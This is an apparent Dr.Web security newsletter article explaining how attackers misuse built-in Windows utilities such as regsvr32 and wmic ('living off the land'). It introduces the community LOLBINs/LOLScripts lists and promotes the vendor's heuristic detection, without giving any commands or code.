Your browser is obsolete!

The page may not load correctly.

Unexpected guests

Незваные гости

Other issues in this category (57)
  • add to favourites
    Add to Bookmarks

Let's look through the list

Read: 1523 Comments: 4 Rating: 9

How do criminals attack computers? The answer to this question, which seems obvious, can elicit bewildered shrugs. What’s so difficult about that question given everyone knows all the ways they can do this? Cybercriminals can send a malicious file (or a link to it) in an email. A user can download malware from the Internet (or a malicious script can be executed while a webpage is loading). Malware can be launched from removable media (such as a flash drive). The common attack vectors also include vulnerability exploits and software or firmware backdoors in recently purchased devices.

Those are threats that can be neutralised. But criminals have other options too.

How about regsvr32? This utility is a legitimate piece of software shipped with an out-of-the-box operating system. And it can accomplish a lot. For example, it lets criminals work with elevated privileges so that they can modify the registry and access files. That means these attackers don't have to write the code needed for these actions to be performed—they can take advantage of readily available utilities that have legitimate digital signatures and thus have the trust of system security mechanisms (such as routines based on application white lists). Furthermore, if an attacker can rely on standard utilities, the actual malicious file will be smaller and harder to detect.

By using legitimate applications and utilities, intruders can hide their activities in a system: even if the user decides to take a look at the list of running processes, they won't see anything new. This gives attackers enough time to accomplish their goals. This is how the Cobalt group uses regsvr32, msxsl, and wmic.

That is hardly a novel approach. Observant readers will remember us telling them about malicious scripts that utilise this very approach (some experts estimate that up to 52% of the attacks in 2017 involved PowerShell and WMI (Windows Management Instrumentation) code).

However, in this AVT issue we would like to talk about something else: the group of enthusiasts who decided to compile a complete list of the utilities, scripts, and libraries used by attackers. LOLBINs/LOLScripts/LOLLibs are, respectively, lists of binary files, scripts, and libraries that have no malicious features and usually get installed in target systems by default.

We already mentioned regsvr32. What other utilities appear on the LOLBINs list? For example, Msconfig.exe and Explorer.exe. And here you can find the complete list.

Any security researcher can contribute new items to LOLBINs/LOLScripts/LOLLibs.

How do security experts benefit from such lists? They can learn about applications whose activities may deserve special attention.

Dr.Web recommends

Unfortunately, using legitimate techniques is not the only way for criminals to deploy malicious code. Here’s what’s also in their arsenal:

  • The ability to penetrate systems from unprotected devices (e.g., personal devices belonging to employees or visitors that may be connected to the corporate network);
  • The ability to Infect network devices;
  • The ability to deploy malware by compromising another trusted resource (e.g., application store);
  • The ability to penetrate systems and networks that have lax security;
  • The ability to exploit data transmissions that never get filtered (e.g., DNS data).

We could go on, but meanwhile, Dr.Web 12 provides protection from attacks committed by criminals who leverage the capabilities of legitimate applications. Special heuristic routines have been added that facilitate the detection of LOLBINs/LOLScripts (Living Off The Land Binaries And Scripts) attacks. They are recognised by their specific behaviour patterns and during background and on-demand scans.

#drweb

Rate this issue and receive Dr.Weblings! (1 vote = 1 Dr.Webling)

Sign in and get 10 Dr.Weblings for sharing the link to this issue via social media.

[Twitter]

Unfortunately, due to Facebook's technical limitations, Dr.Weblings cannot be awarded. However, you can share this link with your friends for free.

Tell us what you think

Leave your comment on the day of publication and get 10 Dr.Weblings, or get 1 Dr.Webling for a comment posted any other day. Comments are published automatically and are reviewed by a moderator. Rules for leaving comments about Doctor Web news items.

To leave a comment, you need to log in under your Doctor Web site account. If you don't have an account yet, you can create one.

Comments